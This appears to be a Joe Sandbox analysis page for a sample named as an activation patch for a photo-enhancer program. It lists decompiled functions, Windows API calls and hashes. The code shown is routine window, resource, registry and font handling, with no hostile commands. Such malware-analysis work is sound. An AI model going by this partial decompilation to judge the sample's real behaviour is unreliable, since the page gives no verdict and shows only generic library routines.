API ID: LoadString$FileMessageModuleName
String ID:
API String ID: 704749118-0
Opcode ID: 812d311920031a8e66895dbedfea53089e64aafa65463e8f60422c8f645d5955
Instruction ID: ceac9c6dafe2e417819c9b5c7653bc03c0e73b1c5c8721bcefa97444966463b6
Opcode Fuzzy Hash: 812d311920031a8e66895dbedfea53089e64aafa65463e8f60422c8f645d5955
Instruction Fuzzy Hash: 6B3152716083819EE330EB65C945B9B77D89B86704F00483EB6C8EB2D2DBB999048767

Uniqueness

Uniqueness Score: -1.00%

Function 0044EF30 Relevance: 6.1, APIs: 4, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044EF30(intOrPtr* __eax, void* __ecx, int __edx, void* __eflags) {
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t13;
				intOrPtr* _t43;
				void* _t55;
				long _t56;
				int _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_t44 = __ecx;
				_t55 = __ecx;
				_t57 = __edx;
				_t43 = __eax;
				_t13 = E00403684( *((intOrPtr*)(E0044E4E8(__eax) + 0x14)), __ecx);
				if(_t61 == 0) {
					return _t13;
				}
				E00403450(E0044E4E8(_t43) + 0x14, _t43, _t55, _t55, __edx);
				_t56 = SendMessageA(E00418670(_t43), 0x1a1, __edx, 0);
				_t58 = E0044D5BC(_t43, _t44, _t57, _t61);
				E0042C138(_t43,  &_v32, _t57);
				if(_t56 != _t58) {
					if(_t57 >= E0042C044(_t43)) {
						 *((intOrPtr*)( *_t43 + 0x2c))();
						_v32.top = _v48.top + _t56;
						if(IsRectEmpty( &_v32) == 0) {
							ScrollWindowEx(E00418670(_t43), 0, _t58 - _t56,  &_v32, 0, 0, 0, 6);
						}
					}
					E0044D5FC(_t43);
				}
				return InvalidateRect(E00418670(_t43),  &_v48, 1);
			}

0x0044ef30
0x0044ef30
0x0044ef37
0x0044ef39
0x0044ef3b
0x0044ef4b
0x0044ef50
0x0044f009
0x0044f009
0x0044ef64
0x0044ef7e
0x0044ef89
0x0044ef91
0x0044ef98
0x0044efa3
0x0044efad
0x0044efb6
0x0044efc6
0x0044efe2
0x0044efe2
0x0044efc6
0x0044efe9
0x0044efe9
0x00000000

APIs

SendMessageA.USER32 ref: 0044EF79

Part of subcall function 0044D5BC: SendMessageA.USER32 ref: 0044D5EE

InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044EFFD

Part of subcall function 0042C044: SendMessageA.USER32 ref: 0042C058

IsRectEmpty.USER32(?), ref: 0044EFBF
ScrollWindowEx.USER32 ref: 0044EFE2

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
String ID:
API String ID: 855768636-0
Opcode ID: 9e5418f1d691a9325b46ebb0c0de8143c548934329e90edb6007b66489b6f05d
Instruction ID: 10a93ef1daca5ec4afac806ac6fb62918bca6b9886f72cf97470359dbd205846
Opcode Fuzzy Hash: 9e5418f1d691a9325b46ebb0c0de8143c548934329e90edb6007b66489b6f05d
Instruction Fuzzy Hash: F211387170030027E720BA7E9C86B5B76899B88748F04083FB545EB383DD79D80987AA

Uniqueness

Uniqueness Score: -1.00%

Function 00498790 Relevance: 6.1, APIs: 4, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00498790(void* __eax, intOrPtr* __edx) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				struct tagRECT _v48;
				signed int _t26;
				signed int _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t50;
				signed int _t55;
				signed int _t56;
				void* _t57;
				long _t59;
				intOrPtr _t60;
				long _t61;
				intOrPtr _t62;
				intOrPtr* _t65;
				intOrPtr _t66;
				void* _t67;

				_t67 =  &_v32;
				_t65 = __edx;
				_t50 = __eax;
				_push( *((intOrPtr*)(__eax + 0x30)));
				_push( &_v48);
				_t66 =  *((intOrPtr*)(__edx + 4));
				_t55 =  *((intOrPtr*)(__edx + 0xc)) - _t66 -  *((intOrPtr*)(__eax + 0x30));
				_t56 = _t55 >> 1;
				if(_t55 < 0) {
					asm("adc edx, 0x0");
				}
				_t57 = _t56 + _t66;
				_t64 =  *_t65;
				_t26 =  *((intOrPtr*)(_t65 + 8)) -  *_t65 -  *((intOrPtr*)(_t50 + 0x2c));
				_t27 = _t26 >> 1;
				if(_t26 < 0) {
					asm("adc eax, 0x0");
				}
				E0040AEF4(_t27 + _t64,  *((intOrPtr*)(_t50 + 0x2c)), _t57);
				E00498198(_t67,  &(_v48.right));
				_t32 = _v32;
				_t59 = _v48.left;
				if(_t32 < _t59) {
					OffsetRect( &_v48, _t32 - _t59, 0);
				}
				_t33 = _v20;
				_t60 = _v48.bottom;
				if(_t33 < _t60) {
					OffsetRect( &_v48, 0, _t33 - _t60);
				}
				_t34 = _v32;
				_t61 = _v48.left;
				if(_t34 > _t61) {
					OffsetRect( &_v48, _t34 - _t61, 0);
				}
				_t35 = _v28;
				_t62 = _v48.top;
				if(_t35 > _t62) {
					OffsetRect( &_v48, 0, _t35 - _t62);
				}
				return E00414B0C(_t50, _t67);
			}

0x00498794
0x00498797
0x00498799
0x0049879e
0x004987a3
0x004987a7
0x004987ac
0x004987af
0x004987b1
0x004987b3
0x004987b3
0x004987b6
0x004987bb
0x004987bf
0x004987c2
0x004987c4
0x004987c6
0x004987c6
0x004987ce
0x004987d9
0x004987de
0x004987e2
0x004987e8
0x004987f4
0x004987f4
0x004987f9
0x004987fd
0x00498803
0x0049880f
0x0049880f
0x00498814
0x00498818
0x0049881d
0x00498829
0x00498829
0x0049882e
0x00498832
0x00498838
0x00498844
0x00498844
0x00498859

APIs

OffsetRect.USER32(?,?,00000000), ref: 004987F4
OffsetRect.USER32(?,00000000,?), ref: 0049880F
OffsetRect.USER32(?,?,00000000), ref: 00498829
OffsetRect.USER32(?,00000000,?), ref: 00498844

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: OffsetRect
String ID:
API String ID: 177026234-0
Opcode ID: 6336d15f36953f24f9fc14a3ec9817a63ff553bf727e99fcd033c27e753f75de
Instruction ID: 3054ac6025076f3b6e7609c5ec68807071a52c8bb3756e2ec3ebb03cdf9dd8d0
Opcode Fuzzy Hash: 6336d15f36953f24f9fc14a3ec9817a63ff553bf727e99fcd033c27e753f75de
Instruction Fuzzy Hash: A4213BB66042019BD700DE6DCD85E6BB7EEEBC4300F54CA2EF554C724ADA34E94487A6

Uniqueness

Uniqueness Score: -1.00%

Function 004176A8 Relevance: 6.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004176A8(intOrPtr* __eax, void* __edx) {
				char _v20;
				void* _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				struct HWND__* _t26;
				intOrPtr _t28;
				intOrPtr _t31;
				intOrPtr _t32;
				struct HICON__* _t34;
				void* _t39;
				intOrPtr* _t40;
				intOrPtr _t50;
				void* _t51;
				struct tagPOINT* _t52;

				_t51 = __edx;
				_t40 = __eax;
				if( *((intOrPtr*)(__edx + 4)) !=  *((intOrPtr*)(__eax + 0xc0))) {
					L16:
					return  *((intOrPtr*)( *_t40 - 0x10))();
				}
				_t22 =  *((intOrPtr*)(__edx + 8)) - 0xfffe;
				if(_t22 == 0) {
					if( *((short*)(__edx + 0xa)) != 0x201) {
						goto L16;
					}
					_t23 =  *0x49e62c; // 0x2252410
					if( *((intOrPtr*)(_t23 + 0x20)) == 0) {
						goto L16;
					}
					_t24 =  *0x49e62c; // 0x2252410
					_t26 = GetLastActivePopup( *(_t24 + 0x20));
					if(_t26 == GetForegroundWindow()) {
						goto L16;
					}
					_t28 =  *0x49e62c; // 0x2252410
					return E004246D0(_t28);
				}
				if(_t22 != 3) {
					goto L16;
				}
				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
					_t31 =  *0x49e630; // 0x2250660
					_t50 =  *((intOrPtr*)(_t31 + 0x28));
					if(_t50 == 0) {
						GetCursorPos(_t52);
						E00414C4C(_t40,  &_v20, _t52);
						_t39 = E00416D60(_t40, 0,  &_v20);
						if(_t39 != 0) {
							_t50 =  *((intOrPtr*)(_t39 + 0x4c));
						}
						if(_t50 == 0) {
							_t50 =  *((intOrPtr*)(_t40 + 0x4c));
						}
					}
				} else {
					_t50 = 0xfffe;
				}
				if(_t50 == 0) {
					goto L16;
				} else {
					_t32 =  *0x49e630; // 0x2250660
					_t34 = SetCursor(E004237FC(_t32, _t50));
					 *((intOrPtr*)(_t51 + 0xc)) = 1;
					return _t34;
				}
			}

0x004176ae
0x004176b0
0x004176bb
0x00417779
0x00000000
0x0041777f
0x004176c5
0x004176c9
0x00417747
0x00000000
0x00000000
0x00417749
0x00417752
0x00000000
0x00000000
0x00417754
0x0041775d
0x0041776b
0x00000000
0x00000000
0x0041776d
0x00000000
0x00417772
0x004176cf
0x00000000
0x00000000
0x004176d9
0x004176e1
0x004176e6
0x004176ed
0x004176f0
0x004176fd
0x0041770a
0x00417711
0x00417713
0x00417713
0x0041771a
0x0041771c
0x0041771c
0x0041771a
0x004176db
0x004176db
0x004176db
0x00417723
0x00000000
0x00417725
0x00417728
0x00417733
0x00417738
0x00000000
0x00417738

APIs

GetCursorPos.USER32 ref: 004176F0
SetCursor.USER32(00000000), ref: 00417733
GetLastActivePopup.USER32(?), ref: 0041775D
GetForegroundWindow.USER32(?), ref: 00417764

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Cursor$ActiveForegroundLastPopupWindow
String ID:
API String ID: 1959210111-0
Opcode ID: e473d6fd5258e5271c1e4462a64c5a209d04cf0713861ccc24dc9748cac10f85
Instruction ID: 2e5a0fdf5ba03c47f255224e58a8cf5d0223c50b95843e628a0bc5c759944eb4
Opcode Fuzzy Hash: e473d6fd5258e5271c1e4462a64c5a209d04cf0713861ccc24dc9748cac10f85
Instruction Fuzzy Hash: C521A1342086018ACB10EF2AD885ADB33B1AB54754F45456BE4658B3A2D73CFC80CB89

Uniqueness

Uniqueness Score: -1.00%

Function 00498448 Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00498448(intOrPtr* __eax, int __ecx, int __edx, int _a4, int _a8) {
				int _v8;
				int _v12;
				intOrPtr* _t38;
				int _t48;
				int _t49;
				int _t52;
				int _t53;

				_t48 = __ecx;
				_t52 = __edx;
				_t38 = __eax;
				_t1 = _t38 + 0x24; // 0x8b500000
				_v8 = MulDiv( *_t1, __edx, __ecx);
				_t5 = _t38 + 0x28; // 0x50142444
				_v12 = MulDiv( *_t5, _a8, _a4);
				if(( *(_t38 + 0x35) & 0x00000001) != 0) {
					_t11 = _t38 + 0x2c; // 0xf6d0dbe8
					_t53 =  *_t11;
				} else {
					_t10 = _t38 + 0x2c; // 0xf6d0dbe8
					_t53 = MulDiv( *_t10, _t52, _t48);
				}
				if(( *(_t38 + 0x35) & 0x00000002) != 0) {
					_t18 = _t38 + 0x30; // 0x8bf88bff
					_t49 =  *_t18;
				} else {
					_t17 = _t38 + 0x30; // 0x8bf88bff
					_t49 = MulDiv( *_t17, _a8, _a4);
				}
				return  *((intOrPtr*)( *_t38 + 0x4c))(_t49, _t53);
			}

0x00498451
0x00498453
0x00498455
0x00498459
0x00498462
0x0049846d
0x00498476
0x0049847d
0x0049848e
0x0049848e
0x0049847f
0x00498481
0x0049848a
0x0049848a
0x00498495
0x004984ac
0x004984ac
0x00498497
0x0049849f
0x004984a8
0x004984a8
0x004984c4

APIs

MulDiv.KERNEL32(8B500000,00000008,?), ref: 0049845D
MulDiv.KERNEL32(50142444,00000008,?), ref: 00498471
MulDiv.KERNEL32(F6D0DBE8,00000008,?), ref: 00498485
MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 004984A3

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 132935396d45b7e69a68efe33a8bbc5bdde74f5cffd31387bad91a8df47aab5f
Instruction ID: 16986aa08010ea5786b5adfb16098ff8e4cfd335a8687684758257d255a94a27
Opcode Fuzzy Hash: 132935396d45b7e69a68efe33a8bbc5bdde74f5cffd31387bad91a8df47aab5f
Instruction Fuzzy Hash: E6112172604214ABCB40DFADC8C4D9B7BECEF4D330B14416AF918DB246DA34ED408BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041F910 Relevance: 6.1, APIs: 4, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041F910(intOrPtr _a4, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				struct HINSTANCE__* _t8;
				signed int _t9;
				signed int _t11;
				struct HINSTANCE__* _t13;
				CHAR* _t14;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;

				_t5 =  *0x49e014; // 0x400000
				 *0x49c5a8 = _t5;
				_t7 =  *0x49c5bc; // 0x41f900
				_t8 =  *0x49e014; // 0x400000
				_t9 = GetClassInfoA(_t8, _t7,  &_v44);
				asm("sbb eax, eax");
				_t11 =  ~( ~_t9);
				if(_t11 == 0 || L00405E1C != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x49e014; // 0x400000
						_t20 =  *0x49c5bc; // 0x41f900
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x49c598);
				}
				_t13 =  *0x49e014; // 0x400000
				_t14 =  *0x49c5bc; // 0x41f900
				_t22 = E00406300(_t14, 0, 0x41f9b0, 0, _t13, 0, 0, 0, 0, 0, 0);
				SetWindowLongA(_t22, 0xfffffffc, E0041F854(_a4, _a8));
				return _t22;
			}

0x0041f917
0x0041f91c
0x0041f925
0x0041f92b
0x0041f931
0x0041f938
0x0041f93a
0x0041f93e
0x0041f94c
0x0041f94e
0x0041f954
0x0041f95a
0x0041f95a
0x0041f964
0x0041f964
0x0041f975
0x0041f984
0x0041f98e
0x0041f99f
0x0041f9aa

APIs

GetClassInfoA.USER32 ref: 0041F931
UnregisterClassA.USER32 ref: 0041F95A
RegisterClassA.USER32 ref: 0041F964
SetWindowLongA.USER32 ref: 0041F99F

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: 5f2beac9259aabfde2fa88ee50984dcdd8da4d914c3ba614155804bbda9a3f11
Instruction ID: 68e5657fabb3e6ce4c602d6ce4962bfcd13d5dfe703a8334c3f88caa16143e55
Opcode Fuzzy Hash: 5f2beac9259aabfde2fa88ee50984dcdd8da4d914c3ba614155804bbda9a3f11
Instruction Fuzzy Hash: 10019EB22001147BCB10EF69DC81E9B3798A719324B10413BBA05EB2E1C63AAC158BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00455778 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

WaitForInputIdle.USER32 ref: 004557A4
MsgWaitForMultipleObjects.USER32 ref: 004557C6
GetExitCodeProcess.KERNEL32 ref: 004557D5
CloseHandle.KERNEL32(?,00455802,004557FB,?,?,?,00000000,?,?,004559D7,?,?,?,00000044,00000000,00000000), ref: 004557F5

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
String ID:
API String ID: 4071923889-0
Opcode ID: 50d72ea7d667734f1bccca64eb66bfa6b711491f1f06d8a60cdd45e65d548796
Instruction ID: 5ee05597952c7b60c0905264d30be017cf261a6af7f6414952b470fafc47fcf8
Opcode Fuzzy Hash: 50d72ea7d667734f1bccca64eb66bfa6b711491f1f06d8a60cdd45e65d548796
Instruction Fuzzy Hash: B801B970A40A18BEEB10D7A58C16F7BBBACDF49770F610567F904D72C2D5B85D00C668

Uniqueness

Uniqueness Score: -1.00%

Function 0040D4A0 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040D4A0(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t30;
				void* _t31;
				struct HINSTANCE__* _t32;
				void* _t33;

				_v8 = _t24;
				_t32 = __edx;
				_t23 = __eax;
				_t30 = FindResourceA(__edx, _v8, _a4);
				 *(_t23 + 0x10) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E0040D42C(_t23, _t30, _t32, _t34, _t33);
				}
				_t5 = _t23 + 0x10; // 0x72756f73
				_t31 = LoadResource(_t32,  *_t5);
				 *(_t23 + 0x14) = _t31;
				_t35 = _t31;
				if(_t31 == 0) {
					E0040D42C(_t23, _t31, _t32, _t35, _t33);
				}
				_t7 = _t23 + 0x10; // 0x72756f73
				_push(SizeofResource(_t32,  *_t7));
				_t8 = _t23 + 0x14; // 0x74536563
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E0040D1B4(_t23, _t25, _t18);
			}

0x0040d4a7
0x0040d4aa
0x0040d4ac
0x0040d4bc
0x0040d4be
0x0040d4c1
0x0040d4c3
0x0040d4c6
0x0040d4cb
0x0040d4cc
0x0040d4d6
0x0040d4d8
0x0040d4db
0x0040d4dd
0x0040d4e0
0x0040d4e5
0x0040d4e6
0x0040d4f0
0x0040d4f1
0x0040d4f5
0x0040d4fe
0x0040d509

APIs

FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D4B7
LoadResource.KERNEL32(00400000,72756F73,0040AC58,00400000,00000001,00000000,?,0040D414,00000000,?,00000000,?,?,0047ED94,0000000A,00000000), ref: 0040D4D1
SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040AC58,00400000,00000001,00000000,?,0040D414,00000000,?,00000000,?,?,0047ED94), ref: 0040D4EB
LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040AC58,00400000,00000001,00000000,?,0040D414,00000000,?,00000000,?), ref: 0040D4F5

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 146d62a64cdcb80c66571f8281f49d7a59a9e34acf0186420e912b6f8abb6fea
Instruction ID: 6e22508d3f73bf4cb8027158dc6397cf7561c54783b82958bb500a3598b7952a
Opcode Fuzzy Hash: 146d62a64cdcb80c66571f8281f49d7a59a9e34acf0186420e912b6f8abb6fea
Instruction Fuzzy Hash: 66F017736055046F9744EEADA881D6B77DCDE48364310417FF908D7246D938DD118B78

Uniqueness

Uniqueness Score: -1.00%

Function 004565CC Relevance: 6.0, APIs: 4, Instructions: 41
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004565CC(void* __eax, void* __ecx, void* __edx, void* __eflags) {
				void* _v12;
				int _t13;
				void* _t20;
				void* _t26;

				_push(__ecx);
				_t20 = __edx;
				_t26 = __eax;
				if(E0042E2AC(0,  *((intOrPtr*)(0x49ca60 + (E0042E084( &_v12) & 0x0000007f) * 4)), 0x80000002,  &_v12, 2, 0) == 0) {
					RegDeleteValueA(_v12, E00403738(_t26));
					RegCloseKey(_v12);
				}
				_t13 = RemoveFontResourceA(E00403738(_t20));
				if(_t13 != 0) {
					_t13 = SendNotifyMessageA(0xffff, 0x1d, 0, 0);
				}
				return _t13;
			}

0x004565ce
0x004565cf
0x004565d1
0x004565f9
0x00456608
0x00456611
0x00456611
0x0045661e
0x00456625
0x00456632
0x00456632
0x0045663a

APIs

Part of subcall function 0042E2AC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00485FB3,?,00000001,?,?,00485FB3,?,00000001,00000000), ref: 0042E2C8

RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045C03E,?,?,?,?,?,00000000,0045C065), ref: 00456608
RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045C03E,?,?,?,?,?,00000000), ref: 00456611
RemoveFontResourceA.GDI32(00000000), ref: 0045661E
SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00456632

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
String ID:
API String ID: 4283692357-0
Opcode ID: 0144adda08525407a7e8f3b5244105c9112ab39d3edb3319c9ec77ff886cb319
Instruction ID: 8f096fb0a68a4ca8fa6e8945f44f96b9dbd63233ba955a9cb78d2d10420d775d
Opcode Fuzzy Hash: 0144adda08525407a7e8f3b5244105c9112ab39d3edb3319c9ec77ff886cb319
Instruction Fuzzy Hash: A4F05EB574131076EA10B6B69D87F5B268C8F54745F50483BBA00EF2C3D97CD805566E

Uniqueness

Uniqueness Score: -1.00%

Function 00471658 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00471658(char __eax, void* __ecx, char __edx, void* __edi) {
				char _v5;
				char _v12;
				char _v16;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t16;
				void* _t22;
				char _t34;

				_t33 = __edi;
				_t22 = __ecx;
				_t34 = __edx;
				_v5 = __eax;
				_t35 = __ecx;
				if(__ecx == 0) {
					_v16 = __edx;
					_v12 = 0xb;
					__eflags = 0;
					E004587AC("Unsetting NTFS compression on directory: %s", __ecx, 0,  &_v16, __edi, __edx);
				} else {
					_v16 = __edx;
					_v12 = 0xb;
					E004587AC("Setting NTFS compression on directory: %s", __ecx, 0,  &_v16, __edi, __edx);
				}
				_t16 = E004536DC(_v5, _t22, _t34, _t35);
				if(_t16 == 0) {
					_v16 = GetLastError();
					_v12 = 0;
					return E004587AC("Failed to set NTFS compression state (%d).", _t22, 0,  &_v16, _t33, _t34);
				}
				return _t16;
			}

0x00471658
0x00471660
0x00471662
0x00471664
0x00471667
0x00471669
0x00471683
0x00471686
0x0047168d
0x00471694
0x0047166b
0x0047166b
0x0047166e
0x0047167c
0x0047167c
0x004716a0
0x004716a7
0x004716ae
0x004716b1
0x00000000
0x004716bf
0x004716c9

APIs

GetLastError.KERNEL32(00000000,00000000), ref: 004716A9

Strings

Setting NTFS compression on directory: %s, xrefs: 00471677
Unsetting NTFS compression on directory: %s, xrefs: 0047168F
Failed to set NTFS compression state (%d)., xrefs: 004716BA

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ErrorLast
String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
API String ID: 1452528299-1392080489
Opcode ID: 4cef6f6a4a71dfcfdb95b2b4fcf457652783e7f00feeb96097633952fc34e028
Instruction ID: 126f6134b27ad8e4671cf18fb541cded6235f59fca6c90d789c2948c6de7ddb8
Opcode Fuzzy Hash: 4cef6f6a4a71dfcfdb95b2b4fcf457652783e7f00feeb96097633952fc34e028
Instruction Fuzzy Hash: 9C014F30E082486BCB04DBAD54412DDBBE49F4D305F58C1EFA458E7292DA780A088BAA

Uniqueness

Uniqueness Score: -1.00%

